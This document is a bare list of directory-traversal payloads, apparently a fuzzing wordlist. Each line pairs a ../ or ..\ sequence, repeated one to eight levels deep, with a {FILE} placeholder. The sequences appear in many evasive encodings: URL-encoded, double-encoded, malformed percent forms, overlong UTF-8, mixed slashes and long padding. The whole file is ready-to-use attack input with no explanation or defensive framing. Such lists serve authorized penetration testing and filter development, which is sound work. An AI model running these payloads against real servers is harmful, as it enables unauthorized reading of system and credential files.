/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
||||
/../../../../{FILE}
|
||||
/../../../../../{FILE}
|
||||
/../../../../../../{FILE}
|
||||
/../../../../../../../{FILE}
|
||||
/../../../../../../../../{FILE}
|
||||
/..%2f{FILE}
|
||||
/..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/..%252f{FILE}
|
||||
/..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\{FILE}
|
||||
/..\..\..\{FILE}
|
||||
/..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\..\{FILE}
|
||||
/..%5c{FILE}
|
||||
/..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/..%255c{FILE}
|
||||
/..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
||||
/../../../../{FILE}
|
||||
/../../../../../{FILE}
|
||||
/../../../../../../{FILE}
|
||||
/../../../../../../../{FILE}
|
||||
/../../../../../../../../{FILE}
|
||||
/..%2f{FILE}
|
||||
/..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/..%252f{FILE}
|
||||
/..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\{FILE}
|
||||
/..\..\..\{FILE}
|
||||
/..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\..\{FILE}
|
||||
/..%5c{FILE}
|
||||
/..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/..%255c{FILE}
|
||||
/..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/\../{FILE}
|
||||
/\../\../{FILE}
|
||||
/\../\../\../{FILE}
|
||||
/\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../\../\../\../{FILE}
|
||||
//..\{FILE}
|
||||
//..\/..\{FILE}
|
||||
//..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\/..\/..\/..\{FILE}
|
||||
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}
|
||||
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}
|
||||
